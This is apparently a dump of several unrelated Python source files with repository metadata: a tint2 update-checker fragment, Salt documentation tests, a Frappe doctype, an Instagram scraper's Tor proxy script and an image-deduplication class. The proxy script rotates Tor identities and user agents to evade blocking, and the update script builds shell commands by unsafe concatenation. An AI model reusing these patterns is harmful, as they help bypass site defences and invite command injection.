                    check_command += " && " + helper_cmd
                check_command += ' >> ' + tmp_file + '"'
                do_check = True
                do_update = False
                do_notify = False

            if sys.argv[i].upper().startswith('-U'):
                tools = sys.argv[i][2::].split(":")
                terminal_name = tools[0]
                try:
                    helper_name = tools[1]
                except IndexError:
                    helper_name = "sudo pacman"
                do_check = False
                do_update = True
                do_notify = False

            if sys.argv[i].upper() == '-N':
                name = "Upd:"

            if sys.argv[i].upper().startswith('-M'):
                name = sys.argv[i][2::]

            if sys.argv[i].upper() == '-H' or sys.argv[i].upper() == '-HELP':
                print("\nt2ec --update -C[aur_helper] | -U<terminal>[:aur_helper] | [-O] [-N] | [-M<custom_name>]\n")
                print("-C[aur_helper] - (C)heck updates with pacman and optionally AUR helper")
                print(" example: t2ec --update -Ctrizen\n")
                print("-U<terminal>[:aur_helper] - (U)pdate in <terminal> with pacman or AUR helper")
                print(" example: t2ec --update -Uxfce4-terminal:trizen\n")
                print("-O - display saved pending updates as n(O)tification")
                print("-N - print (N)ame instead of icon")
                print("-M<custom_name> - print custom na(M)e instead of icon\n")

    if do_check:
        if name is not None:
            os.system("echo Checking...")
        else:
            os.system("echo /usr/share/t2ec/refresh.svg")
            os.system("echo ''")
        subprocess.call(check_command, shell=True)
        updates = open(tmp_file, 'r').read().rstrip()
        num_upd = len(updates.splitlines())
        if name is not None:
            if num_upd > 0:
                print(name + " " + str(num_upd))
            else:
                print("Up-to-date")
        else:
            if num_upd > 0:
                os.system("echo /usr/share/t2ec/arch-icon-notify.svg")
                os.system("echo " + str(num_upd))
            else:
                os.system("echo /usr/share/t2ec/arch-icon.svg")
                os.system("echo ''")

    if do_update:
        command = terminal_name + ' -e \'sh -c \"' + helper_name + ' -Syu; echo Press enter to exit; read; killall -SIGUSR1 tint2\"\''
        subprocess.call(command, shell=True)

    if do_notify:
        updates = open(tmp_file, 'r').read().rstrip()
        notify(updates)


def notify(updates):
    subprocess.call(
        ['notify-send', "Pending updates:", "--icon=/usr/share/t2ec/arch-update48.svg", "--expire-time=5000", updates])


def show_menu():
    try:
        subprocess.check_output("which jgmenu", shell=True)
    except subprocess.CalledProcessError:
        print("\nInstall jgmenu package, run `jgmenu init`\n")
        return
    t2ec_dir = os.getenv("HOME") + "/.t2ecol"
    if not os.path.isdir(t2ec_dir):
        os.makedirs(t2ec_dir)
    if not os.path.isfile(t2ec_dir + "/menu-update.sh"):
        subprocess.call(["cp /usr/lib/t2ec/menu-update.sh "+ t2ec_dir + "/menu-update.sh"], shell=True)
    subprocess.call([t2ec_dir + '/menu-update.sh'], shell=True)


if __name__ == "__main__":
    main()
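
# Editorial usage sketch (mirrors the -h text above; the `t2ec` wrapper is assumed):
#   t2ec --update -Ctrizen                  # check pacman + AUR updates
#   t2ec --update -Uxfce4-terminal:trizen   # run the update in a terminal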
| 33.313725 | 134 | 0.530116 | 616 | 5,097 | 4.261364 | 0.282468 | 0.034667 | 0.030476 | 0.034667 | 0.212952 | 0.14781 | 0.101333 | 0.045714 | 0 | 0 | 0 | 0.010647 | 0.318226 | 5,097 | 152 | 135 | 33.532895 | 0.744748 | 0.128899 | 0 | 0.227723 | 0 | 0.029703 | 0.244189 | 0.053035 | 0 | 0 | 0 | 0 | 0 | 1 | 0.029703 | false | 0.009901 | 0.029703 | 0 | 0.069307 | 0.108911 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
3905bcd7408ea63d921f3109b9efc0c9b7cc46b6 | 21,558 | py | Python | tests/unit/test_doc.py | alexey-zhukovin/salt | 87382072abf353f3da62ae4e2d9fe1ba14344efa | [
"Apache-2.0"
] | 1 | 2021-09-06T00:14:04.000Z | 2021-09-06T00:14:04.000Z | tests/unit/test_doc.py | alexey-zhukovin/salt | 87382072abf353f3da62ae4e2d9fe1ba14344efa | [
"Apache-2.0"
] | 2 | 2021-04-30T21:17:57.000Z | 2021-12-13T20:40:23.000Z | tests/unit/test_doc.py | Kamatera/salt | ac960a3308617657d9d039dae9108e0045ab3929 | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
"""
    tests.unit.doc_test
    ~~~~~~~~~~~~~~~~~~~~
"""
# Import Python libs
from __future__ import absolute_import
import collections
import logging
import os
import re
# Import Salt libs
import salt.modules.cmdmod
import salt.utils.files
import salt.utils.platform
from tests.support.runtests import RUNTIME_VARS
# Import Salt Testing libs
from tests.support.unit import TestCase, skipIf
log = logging.getLogger(__name__)
class DocTestCase(TestCase):
"""
Unit test case for testing doc files and strings.
"""
@skipIf(True, "SLOWTEST skip")
def test_check_for_doc_inline_markup(self):
"""
We should not be using the ``:doc:`` inline markup option when
cross-referencing locations. Use ``:ref:`` or ``:mod:`` instead.
This test checks for reference to ``:doc:`` usage.
See Issue #12788 for more information.
https://github.com/saltstack/salt/issues/12788
"""
salt_dir = RUNTIME_VARS.CODE_DIR
if salt.utils.platform.is_windows():
if salt.utils.path.which("bash"):
# Use grep from git-bash when it exists.
cmd = "bash -c 'grep -r :doc: ./salt/"
grep_call = salt.modules.cmdmod.run_stdout(cmd=cmd, cwd=salt_dir).split(
os.linesep
)
os_sep = "/"
else:
# No grep in Windows, use findstr
# findstr in windows doesn't prepend 'Binary` to binary files, so
# use the '/P' switch to skip files with unprintable characters
cmd = 'findstr /C:":doc:" /S /P {0}\\*'.format(salt_dir)
grep_call = salt.modules.cmdmod.run_stdout(cmd=cmd).split(os.linesep)
os_sep = os.sep
else:
salt_dir += "/"
cmd = "grep -r :doc: " + salt_dir
grep_call = salt.modules.cmdmod.run_stdout(cmd=cmd).split(os.linesep)
os_sep = os.sep
test_ret = {}
for line in grep_call:
# Skip any .pyc files that may be present
if line.startswith("Binary"):
continue
# Only split on colons not followed by a '\' as is the case with
# Windows Drives
regex = re.compile(r":(?!\\)")
try:
key, val = regex.split(line, 1)
except ValueError:
log.error("Could not split line: %s", line)
continue
# Don't test man pages, this file, the tox or nox virtualenv files,
# the page that documents to not use ":doc:", the doc/conf.py file
# or the artifacts directory on nox CI test runs
if (
"man" in key
or ".tox{}".format(os_sep) in key
or ".nox{}".format(os_sep) in key
or "ext{}".format(os_sep) in key
or "artifacts{}".format(os_sep) in key
or key.endswith("test_doc.py")
or key.endswith(os_sep.join(["doc", "conf.py"]))
or key.endswith(os_sep.join(["conventions", "documentation.rst"]))
or key.endswith(
os_sep.join(["doc", "topics", "releases", "2016.11.2.rst"])
)
or key.endswith(
os_sep.join(["doc", "topics", "releases", "2016.11.3.rst"])
)
or key.endswith(
os_sep.join(["doc", "topics", "releases", "2016.3.5.rst"])
)
):
continue
# Set up test return dict
if test_ret.get(key) is None:
test_ret[key] = [val.strip()]
else:
test_ret[key].append(val.strip())
# Allow test results to show files with :doc: ref, rather than truncating
self.maxDiff = None
# test_ret should be empty, otherwise there are :doc: references present
self.assertEqual(test_ret, {})
def _check_doc_files(self, module_skip, module_dir, doc_skip, module_doc_dir):
"""
Ensure various salt modules have associated documentation
"""
salt_dir = RUNTIME_VARS.CODE_DIR
# Build list of module files
module_files = []
skip_module_files = module_skip
full_module_dir = os.path.join(salt_dir, *module_dir)
for file in os.listdir(full_module_dir):
if file.endswith(".py"):
module_name = os.path.splitext(file)[0]
if module_name not in skip_module_files:
module_files.append(module_name)
# Capture modules in subdirectories like inspectlib and rest_cherrypy
elif (
os.path.isdir(os.path.join(full_module_dir, file))
and not file.startswith("_")
and os.path.isfile(os.path.join(full_module_dir, file, "__init__.py"))
):
module_name = file
if module_name not in skip_module_files:
module_files.append(module_name)
# Build list of documentation files
module_docs = []
skip_doc_files = doc_skip
full_module_doc_dir = os.path.join(salt_dir, *module_doc_dir)
doc_prefix = ".".join(module_dir) + "."
for file in os.listdir(full_module_doc_dir):
if file.endswith(".rst"):
doc_name = os.path.splitext(file)[0]
if doc_name.startswith(doc_prefix):
doc_name = doc_name[len(doc_prefix) :]
if doc_name not in skip_doc_files:
module_docs.append(doc_name)
module_index_file = os.path.join(full_module_doc_dir, "index.rst")
with salt.utils.files.fopen(module_index_file, "rb") as fp:
module_index_contents = fp.read().decode("utf-8")
module_index_block = re.search(
r"""
\.\.\s+autosummary::\s*\n
(\s+:[a-z]+:.*\n)*
(\s*\n)+
(?P<mods>(\s*[a-z0-9_\.]+\s*\n)+)
""",
module_index_contents,
flags=re.VERBOSE,
)
module_index = re.findall(
r"""\s*([a-z0-9_\.]+)\s*\n""", module_index_block.group("mods")
)
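
        # The VERBOSE regex above targets Sphinx autosummary blocks shaped like
        # (a hypothetical illustration, not copied from an actual index.rst):
        #
        #     .. autosummary::
        #         :toctree:
        #
        #         salt.auth.rest
        #         salt.auth.pam
        #
        # re.findall then pulls the dotted module names out of the "mods" group.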
        # Check that every module has associated documentation file
        for module in module_files:
            self.assertIn(
                module,
                module_docs,
                "module file {0} is missing documentation in {1}".format(
                    module, full_module_doc_dir
                ),
            )

            # Check that every module is listed in the index file
            self.assertIn(
                module,
                module_index,
                "module file {0} is missing in {1}".format(module, module_index_file),
            )

            # Check if .rst file for this module contains the text
            # ".. _virtual" indicating it is a virtual doc page
            full_module_doc_name = os.path.join(
                full_module_doc_dir, doc_prefix + module + ".rst"
            )
            with salt.utils.files.fopen(full_module_doc_name) as rst_file:
                rst_text = rst_file.read()
            virtual_string = 'module file "{0}" is also a virtual doc page {1} and is not accessible'
            self.assertNotIn(
                ".. _virtual",
                rst_text,
                virtual_string.format(module, doc_prefix + module + ".rst"),
            )

        for doc_file in module_docs:
            self.assertIn(
                doc_file,
                module_files,
                "Doc file {0} is missing associated module in {1}".format(
                    doc_file, full_module_dir
                ),
            )

        # Check that a module index is sorted
        sorted_module_index = sorted(module_index)
        self.assertEqual(
            module_index,
            sorted_module_index,
            msg="Module index is not sorted: {}".format(module_index_file),
        )

        # Check for duplicates inside of a module index
        module_index_duplicates = [
            mod for mod, count in collections.Counter(module_index).items() if count > 1
        ]
        if module_index_duplicates:
            self.fail(
                "Module index {0} contains duplicates: {1}".format(
                    module_index_file, module_index_duplicates
                )
            )

        # Check for stray module docs
        # Do not check files listed in doc_skip
        stray_modules = set(module_index).difference(module_files + doc_skip)
        if stray_modules:
            self.fail(
                "Stray module names {0} in the doc index {1}".format(
                    sorted(list(stray_modules)), module_index_file
                )
            )
        stray_modules = set(module_docs).difference(module_files)
        if stray_modules:
            self.fail(
                "Stray module doc files {0} in the doc folder {1}".format(
                    sorted(list(stray_modules)), full_module_doc_dir
                )
            )

    def test_auth_doc_files(self):
        """
        Ensure auth modules have associated documentation

        doc example: doc/ref/auth/all/salt.auth.rest.rst
        auth module example: salt/auth/rest.py
        """
        skip_files = ["__init__"]
        module_dir = ["salt", "auth"]
        skip_doc_files = ["index", "all"]
        doc_dir = ["doc", "ref", "auth", "all"]
        self._check_doc_files(skip_files, module_dir, skip_doc_files, doc_dir)

    def test_beacon_doc_files(self):
        """
        Ensure beacon modules have associated documentation

        doc example: doc/ref/beacons/all/salt.beacon.rest.rst
        beacon module example: salt/beacons/rest.py
        """
        skip_files = ["__init__"]
        module_dir = ["salt", "beacons"]
        skip_doc_files = ["index", "all"]
        doc_dir = ["doc", "ref", "beacons", "all"]
        self._check_doc_files(skip_files, module_dir, skip_doc_files, doc_dir)

    def test_cache_doc_files(self):
        """
        Ensure cache modules have associated documentation

        doc example: doc/ref/cache/all/salt.cache.consul.rst
        cache module example: salt/cache/consul.py
        """
        skip_module_files = ["__init__"]
        module_dir = ["salt", "cache"]
        skip_doc_files = ["index", "all"]
        doc_dir = ["doc", "ref", "cache", "all"]
        self._check_doc_files(skip_module_files, module_dir, skip_doc_files, doc_dir)

    def test_cloud_doc_files(self):
        """
        Ensure cloud modules have associated documentation

        doc example: doc/ref/clouds/all/salt.cloud.gce.rst
        cloud module example: salt/cloud/clouds/gce.py
        """
        skip_module_files = ["__init__"]
        module_dir = ["salt", "cloud", "clouds"]
        skip_doc_files = ["index", "all"]
        doc_dir = ["doc", "ref", "clouds", "all"]
        self._check_doc_files(skip_module_files, module_dir, skip_doc_files, doc_dir)

    def test_engine_doc_files(self):
        """
        Ensure engine modules have associated documentation

        doc example: doc/ref/engines/all/salt.engines.docker_events.rst
        engine module example: salt/engines/docker_events.py
        """
        skip_module_files = ["__init__"]
        module_dir = ["salt", "engines"]
        skip_doc_files = ["index", "all"]
        doc_dir = ["doc", "ref", "engines", "all"]
        self._check_doc_files(skip_module_files, module_dir, skip_doc_files, doc_dir)

    def test_executors_doc_files(self):
        """
        Ensure executor modules have associated documentation

        doc example: doc/ref/executors/all/salt.executors.docker.rst
        engine module example: salt/executors/docker.py
        """
        skip_module_files = ["__init__"]
        module_dir = ["salt", "executors"]
        skip_doc_files = ["index", "all"]
        doc_dir = ["doc", "ref", "executors", "all"]
        self._check_doc_files(skip_module_files, module_dir, skip_doc_files, doc_dir)

    def test_fileserver_doc_files(self):
        """
        Ensure fileserver modules have associated documentation

        doc example: doc/ref/fileserver/all/salt.fileserver.gitfs.rst
        module example: salt/fileserver/gitfs.py
        """
        skip_module_files = ["__init__"]
        module_dir = ["salt", "fileserver"]
        skip_doc_files = ["index", "all"]
        doc_dir = ["doc", "ref", "file_server", "all"]
        self._check_doc_files(skip_module_files, module_dir, skip_doc_files, doc_dir)

    def test_grain_doc_files(self):
        """
        Ensure grain modules have associated documentation

        doc example: doc/ref/grains/all/salt.grains.core.rst
        module example: salt/grains/core.py
        """
        skip_module_files = ["__init__"]
        module_dir = ["salt", "grains"]
        skip_doc_files = ["index", "all"]
        doc_dir = ["doc", "ref", "grains", "all"]
        self._check_doc_files(skip_module_files, module_dir, skip_doc_files, doc_dir)

    def test_module_doc_files(self):
        """
        Ensure modules have associated documentation

        doc example: doc/ref/modules/all/salt.modules.zabbix.rst
        execution module example: salt/modules/zabbix.py
        """
        skip_module_files = ["__init__"]
        module_dir = ["salt", "modules"]
        skip_doc_files = [
            "index",
            "group",
            "inspectlib.collector",
            "inspectlib.dbhandle",
            "inspectlib.entities",
            "inspectlib.exceptions",
            "inspectlib.fsdb",
            "inspectlib.kiwiproc",
            "inspectlib.query",
            "kernelpkg",
            "pkg",
            "user",
            "service",
            "shadow",
            "sysctl",
        ]
        doc_dir = ["doc", "ref", "modules", "all"]
        self._check_doc_files(skip_module_files, module_dir, skip_doc_files, doc_dir)

    def test_netapi_doc_files(self):
        """
        Ensure netapi modules have associated documentation

        doc example: doc/ref/netapi/all/salt.netapi.rest_cherrypy.rst
        module example: salt/netapi/rest_cherrypy
        """
        skip_module_files = ["__init__"]
        module_dir = ["salt", "netapi"]
        skip_doc_files = ["index", "all"]
        doc_dir = ["doc", "ref", "netapi", "all"]
        self._check_doc_files(skip_module_files, module_dir, skip_doc_files, doc_dir)

    def test_output_doc_files(self):
        """
        Ensure output modules have associated documentation

        doc example: doc/ref/output/all/salt.output.highstate.rst
        module example: salt/output/highstate.py
        """
        skip_module_files = ["__init__"]
        module_dir = ["salt", "output"]
        skip_doc_files = ["index", "all"]
        doc_dir = ["doc", "ref", "output", "all"]
        self._check_doc_files(skip_module_files, module_dir, skip_doc_files, doc_dir)

    def test_pillar_doc_files(self):
        """
        Ensure pillar modules have associated documentation

        doc example: doc/ref/pillar/all/salt.pillar.cobbler.rst
        module example: salt/pillar/cobbler.py
        """
        skip_module_files = ["__init__"]
        module_dir = ["salt", "pillar"]
        skip_doc_files = ["index", "all"]
        doc_dir = ["doc", "ref", "pillar", "all"]
        self._check_doc_files(skip_module_files, module_dir, skip_doc_files, doc_dir)

    def test_proxy_doc_files(self):
        """
        Ensure proxy modules have associated documentation

        doc example: doc/ref/proxy/all/salt.proxy.docker.rst
        module example: salt/proxy/docker.py
        """
        skip_module_files = ["__init__"]
        module_dir = ["salt", "proxy"]
        skip_doc_files = ["index", "all"]
        doc_dir = ["doc", "ref", "proxy", "all"]
        self._check_doc_files(skip_module_files, module_dir, skip_doc_files, doc_dir)

    def test_queues_doc_files(self):
        """
        Ensure queue modules have associated documentation

        doc example: doc/ref/queues/all/salt.queues.sqlite_queue.rst
        module example: salt/queues/sqlite_queue.py
        """
        skip_module_files = ["__init__"]
        module_dir = ["salt", "queues"]
        skip_doc_files = ["index", "all"]
        doc_dir = ["doc", "ref", "queues", "all"]
        self._check_doc_files(skip_module_files, module_dir, skip_doc_files, doc_dir)

    def test_renderers_doc_files(self):
        """
        Ensure render modules have associated documentation

        doc example: doc/ref/renderers/all/salt.renderers.json.rst
        module example: salt/renderers/json.py
        """
        skip_module_files = ["__init__"]
        module_dir = ["salt", "renderers"]
        skip_doc_files = ["index", "all"]
        doc_dir = ["doc", "ref", "renderers", "all"]
        self._check_doc_files(skip_module_files, module_dir, skip_doc_files, doc_dir)

    def test_returners_doc_files(self):
        """
        Ensure return modules have associated documentation

        doc example: doc/ref/returners/all/salt.returners.cassandra_return.rst
        module example: salt/returners/cassandra_return.py
        """
        skip_module_files = ["__init__"]
        module_dir = ["salt", "returners"]
        skip_doc_files = ["index", "all"]
        doc_dir = ["doc", "ref", "returners", "all"]
        self._check_doc_files(skip_module_files, module_dir, skip_doc_files, doc_dir)

    def test_runners_doc_files(self):
        """
        Ensure runner modules have associated documentation

        doc example: doc/ref/runners/all/salt.runners.auth.rst
        module example: salt/runners/auth.py
        """
        skip_module_files = ["__init__"]
        module_dir = ["salt", "runners"]
        skip_doc_files = ["index", "all"]
        doc_dir = ["doc", "ref", "runners", "all"]
        self._check_doc_files(skip_module_files, module_dir, skip_doc_files, doc_dir)

    def test_sdb_doc_files(self):
        """
        Ensure sdb modules have associated documentation

        doc example: doc/ref/sdb/all/salt.sdb.rest.rst
        module example: salt/sdb/rest.py
        """
        skip_module_files = ["__init__"]
        module_dir = ["salt", "sdb"]
        skip_doc_files = ["index", "all"]
        doc_dir = ["doc", "ref", "sdb", "all"]
        self._check_doc_files(skip_module_files, module_dir, skip_doc_files, doc_dir)

    def test_serializers_doc_files(self):
        """
        Ensure serializer modules have associated documentation

        doc example: doc/ref/serializers/all/salt.serializers.yaml.rst
        module example: salt/serializers/yaml.py
        """
        skip_module_files = ["__init__"]
        module_dir = ["salt", "serializers"]
        skip_doc_files = ["index", "all"]
        doc_dir = ["doc", "ref", "serializers", "all"]
        self._check_doc_files(skip_module_files, module_dir, skip_doc_files, doc_dir)

    def test_states_doc_files(self):
        """
        Ensure states have associated documentation

        doc example: doc/ref/states/all/salt.states.zabbix_host.rst
        module example: salt/states/zabbix_host.py
        """
        skip_module_files = ["__init__"]
        module_dir = ["salt", "states"]
        skip_doc_files = ["index", "all"]
        doc_dir = ["doc", "ref", "states", "all"]
        self._check_doc_files(skip_module_files, module_dir, skip_doc_files, doc_dir)

    def test_thorium_doc_files(self):
        """
        Ensure thorium modules have associated documentation

        doc example: doc/ref/thorium/all/salt.thorium.calc.rst
        module example: salt/thorium/calc.py
        """
        skip_module_files = ["__init__"]
        module_dir = ["salt", "thorium"]
        skip_doc_files = ["index", "all"]
        doc_dir = ["doc", "ref", "thorium", "all"]
        self._check_doc_files(skip_module_files, module_dir, skip_doc_files, doc_dir)

    def test_token_doc_files(self):
        """
        Ensure token modules have associated documentation

        doc example: doc/ref/tokens/all/salt.tokens.localfs.rst
        module example: salt/tokens/localfs.py
        """
        skip_module_files = ["__init__"]
        module_dir = ["salt", "tokens"]
        skip_doc_files = ["index", "all"]
        doc_dir = ["doc", "ref", "tokens", "all"]
        self._check_doc_files(skip_module_files, module_dir, skip_doc_files, doc_dir)

    def test_tops_doc_files(self):
        """
        Ensure top modules have associated documentation

        doc example: doc/ref/tops/all/salt.tops.saltclass.rst
        module example: salt/tops/saltclass.py
        """
        skip_module_files = ["__init__"]
        module_dir = ["salt", "tops"]
        skip_doc_files = ["index", "all"]
        doc_dir = ["doc", "ref", "tops", "all"]
        self._check_doc_files(skip_module_files, module_dir, skip_doc_files, doc_dir)

    def test_wheel_doc_files(self):
        """
        Ensure wheel modules have associated documentation

        doc example: doc/ref/wheel/all/salt.wheel.key.rst
        module example: salt/wheel/key.py
        """
        skip_module_files = ["__init__"]
        module_dir = ["salt", "wheel"]
        skip_doc_files = ["index", "all"]
        doc_dir = ["doc", "ref", "wheel", "all"]
        self._check_doc_files(skip_module_files, module_dir, skip_doc_files, doc_dir)
| 35.810631 | 105 | 0.583728 | 2,593 | 21,558 | 4.567682 | 0.127266 | 0.06822 | 0.050659 | 0.044326 | 0.481763 | 0.463441 | 0.443853 | 0.410757 | 0.250675 | 0.172155 | 0 | 0.003652 | 0.301466 | 21,558 | 601 | 106 | 35.870216 | 0.782854 | 0.244132 | 0 | 0.323171 | 0 | 0 | 0.126429 | 0.001396 | 0 | 0 | 0 | 0 | 0.018293 | 1 | 0.079268 | false | 0 | 0.030488 | 0 | 0.112805 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
3906a98a261906d140cb30e83a28612005b970ab | 1,913 | py | Python | tailorpad/admin/doctype/product_options/product_options.py | LaganJ/Tailoring | 2c527e229871c5292a9ed7c92967219b756ba99d | [
"MIT"
] | 2 | 2022-03-21T18:09:21.000Z | 2022-03-22T05:47:50.000Z | tailorpad/admin/doctype/product_options/product_options.py | LaganJ/Tailoring | 2c527e229871c5292a9ed7c92967219b756ba99d | [
"MIT"
] | null | null | null | tailorpad/admin/doctype/product_options/product_options.py | LaganJ/Tailoring | 2c527e229871c5292a9ed7c92967219b756ba99d | [
"MIT"
] | 1 | 2022-03-28T14:28:13.000Z | 2022-03-28T14:28:13.000Z | # Copyright (c) 2022, White Hat Global and contributors
# For license information, please see license.txt
from __future__ import unicode_literals
import frappe
from frappe import _
from frappe.utils import cint, cstr
from frappe.model.document import Document
class ProductOptions(Document):
    def validate(self):
        self.duplicate_product_default()
        self.atleast_one_default()

    def duplicate_product_default(self):
        product_dict = {}
        for product in self.product_fields:
            pass
            # if cint(style.default) == 1 and style_dict.count(style.style_field):
            #     frappe.msgprint("inside")

    def atleast_one_default(self):
        has_default = set([d.product_field for d in self.product_fields if d.default])
        product_fields = set([d.product_field for d in self.product_fields])
        if len(has_default) != len(product_fields):
            for d in product_fields:
                if d not in has_default:
                    frappe.throw(_("At least one default product name is required for product {0}").format(d))
        product = []
        for d in self.get('product_fields'):
            if d.product_field in product and d.default:
                frappe.throw(("You Cannot Select Product {0} Default Multiple Times".format(d.product_field)))
            if d.default:
                product.append(d.product_field)

    def on_update(self):
        for d in self.product_fields:
            name = frappe.db.get_value('Product Name', d.product_option, 'name')
            if not name:
                doc = make_product_name(d.product_field, d.product_option)
            else:
                doc = frappe.get_doc('Product Name', name)
            products = [e.product_field for e in doc.products]
            if d.product_field not in products:
                doc.append('products', {
                    'product_field': d.product_field
                })
            doc.save(ignore_permissions=True)


def make_product_name(product_field, product_option):
    doc = frappe.get_doc({
        'doctype': 'Product Name',
        'product_name': product_option,
        'product': product_field
    }).insert(ignore_permissions=True)
return doc | 32.982759 | 98 | 0.738108 | 283 | 1,913 | 4.791519 | 0.293286 | 0.106195 | 0.076696 | 0.056047 | 0.077434 | 0.077434 | 0.060472 | 0.060472 | 0.060472 | 0.060472 | 0 | 0.004342 | 0.157344 | 1,913 | 58 | 99 | 32.982759 | 0.836849 | 0.102457 | 0 | 0 | 0 | 0 | 0.124927 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.108696 | false | 0.021739 | 0.108696 | 0 | 0.26087 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
3912b626fb6eea72b992a53c272a97d250910d77 | 871 | py | Python | instagram_scraper/proxy.py | smb-h/instagram-scraper | 7c9a5ec99b825ed975b4acc71c970f0853e82eb4 | [
"Unlicense"
] | null | null | null | instagram_scraper/proxy.py | smb-h/instagram-scraper | 7c9a5ec99b825ed975b4acc71c970f0853e82eb4 | [
"Unlicense"
] | 3 | 2022-01-13T04:22:06.000Z | 2022-03-12T01:04:48.000Z | instagram_scraper/proxy.py | smb-h/instagram-scraper | 7c9a5ec99b825ed975b4acc71c970f0853e82eb4 | [
"Unlicense"
] | 1 | 2021-04-27T07:59:28.000Z | 2021-04-27T07:59:28.000Z | import requests
from stem import Signal
from stem.control import Controller
from fake_useragent import UserAgent
import random, time
headers = { 'User-Agent': UserAgent().random }
print(requests.get('https://ident.me', headers=headers).text)
proxies = {
    'http': 'socks5://127.0.0.1:9050',
    'https': 'socks5://127.0.0.1:9050'
}
print(requests.get('https://api.ipify.org', proxies=proxies, headers=headers).text)
wait = random.uniform(0, 5)
print("wait : " + str(wait))
time.sleep(wait)
# signal TOR for a new connection
# https://stackoverflow.com/questions/30286293/make-requests-using-python-over-tor
def renew_connection():
    with Controller.from_port(port = 9051) as c:
        c.authenticate(password="password")
        c.signal(Signal.NEWNYM)
renew_connection()
print(requests.get('https://api.ipify.org', proxies=proxies, headers=headers).text)
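
# Editorial note (not in the original script): the socks5 proxy above needs
# `pip install requests[socks]` (PySocks), and renew_connection() assumes tor's
# ControlPort 9051 is enabled with a matching HashedControlPassword in torrc;
# "password" is a placeholder. A 'socks5h://' scheme would also route DNS via tor.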
| 26.393939 | 83 | 0.718714 | 122 | 871 | 5.098361 | 0.47541 | 0.062701 | 0.07717 | 0.101286 | 0.257235 | 0.257235 | 0.205788 | 0.205788 | 0.205788 | 0.205788 | 0 | 0.04712 | 0.122847 | 871 | 32 | 84 | 27.21875 | 0.767016 | 0.129736 | 0 | 0.095238 | 0 | 0 | 0.183267 | 0.061089 | 0 | 0 | 0 | 0 | 0 | 1 | 0.047619 | false | 0.047619 | 0.238095 | 0 | 0.285714 | 0.190476 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
3916c639b5db2d10c51e8dc556530287daecff0c | 2,781 | py | Python | src/preprocess/remove_duplicate.py | yogendra-yatnalkar/AI_for_any_game_using_CNN | be398c86f61d211534b6b709c5501f2276735552 | [
"MIT"
] | 1 | 2020-05-31T13:02:48.000Z | 2020-05-31T13:02:48.000Z | src/preprocess/remove_duplicate.py | yogendra-yatnalkar/AI_for_any_game_using_CNN | be398c86f61d211534b6b709c5501f2276735552 | [
"MIT"
] | null | null | null | src/preprocess/remove_duplicate.py | yogendra-yatnalkar/AI_for_any_game_using_CNN | be398c86f61d211534b6b709c5501f2276735552 | [
"MIT"
] | null | null | null | from PIL import Image
import imagehash
import os
import pandas as pd
class RemoveDuplicate:
    def __init__(self,img_ds_path, csv_file_path = None, csv_file_name = 'dataset.csv'):
        self.img_ds_path = img_ds_path
        self.hash_db = set()
        self.count_duplicate = 0
        self.count_corrupt = 0
        if(csv_file_path == None):
            self.csv_file_path = os.path.dirname(img_ds_path)
        else:
            self.csv_file_path = csv_file_path
        self.csv_file_name = csv_file_name

    def rm_duplicate_img(self):
        if(os.path.exists(self.csv_file_path)):
            ds_df = pd.read_csv(os.path.join(self.csv_file_path,self.csv_file_name))
            if(os.path.exists(self.img_ds_path)):
                img_db = os.listdir(self.img_ds_path)
                for i in range(len(ds_df['image_name'])):
                    img_name = ds_df['image_name'][i]
                    if(img_name not in img_db):
                        # print('\n',ds_df['image_name'].iloc[i],ds_df['action'].iloc[i], '--- REMOVED from csv file---' ,'\n')
                        print('\n Index : ',i ,'--- REMOVED from csv file---\n')
                        ds_df.drop(i, axis=0, inplace = True)
                        self.count_corrupt += 1
                    else:
                        img = Image.open(os.path.join(self.img_ds_path,img_name))
                        hash = imagehash.phash(img)
                        if(hash in self.hash_db):
                            os.remove(os.path.join(self.img_ds_path,img_name))
                            ds_df.drop(i, axis=0, inplace = True)
                            print('\n',img_name, '--- REMOVED from dataset and csv file ---','\n')
                            self.count_duplicate += 1
                        else:
                            self.hash_db.add(hash)
                            print('Checked: ',img_name)
                        img = None
                        img_db.remove(img_name)
                if(len(img_db) != 0):
                    for img_name in img_db:
                        os.remove(os.path.join(self.img_ds_path,img_name))
                        print('\n',img_name, '--- REMOVED from dataset ---','\n')
                print('\nNo. of corrupted csv entries found and deleted : ',self.count_corrupt)
                print('\nNo. of duplicate images found and deleted : ',self.count_duplicate)
                print('\nNo of unaccounted files : ',len(img_db))
                ds_df.to_csv(os.path.join(self.csv_file_path,'dataset.csv'), index = False)
                print('\nUpdated CSV file saved\n')
            else:
                print("Image DataSet Path do not exist")
        else:
            print("CSV file path do not exist")
